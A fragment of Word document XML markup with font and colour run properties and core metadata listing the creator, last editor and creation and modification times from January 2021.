          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;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ti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4E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ite"/>
    <w:basedOn w:val="4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2021-01-26T08:58:17Z</dcterms:created>
  <dc:creator>xians</dc:creator>
  <cp:lastModifiedBy>Chris</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-01-26T08:58:45Z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